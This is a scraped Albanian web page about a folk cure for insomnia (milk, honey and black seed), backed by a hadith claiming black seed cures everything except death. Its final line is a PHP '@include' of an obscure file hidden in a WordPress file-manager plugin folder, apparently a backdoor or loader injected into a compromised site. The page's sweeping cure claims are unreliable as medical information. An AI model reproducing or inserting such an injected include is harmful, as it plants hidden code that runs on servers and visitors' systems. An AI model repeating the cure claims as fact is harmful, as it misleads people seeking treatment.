Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Ilaç natyral për shërimin e pagjumësisë [insomnisë]

Ilaç natyral për shërimin e pagjumësisë [insomnisë]

 

Për shërimin e pagjumësisë [insomnisë]

Për shërimin e pagjumësisë [insomnisë]: “Gotës me qumësht të ëmbëlsuar me mjaltë i shtohet një lugë e kokrrës së zezë dhe pihet.”

Profeti Muhamed (a.s.) gjithmonë i ka këshilluar muslimanët të kujdesen për shëndetin e tyre dhe, si një doktor i vërtetë i ka dhënë zgjidhje sëmundjeve të ndryshme. Në një hadith Profeti (a.s.) ka thënë: “Në këtë farën e zezë gjendet shërimi i çdo shqetësimi, përveç vdekjes”

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";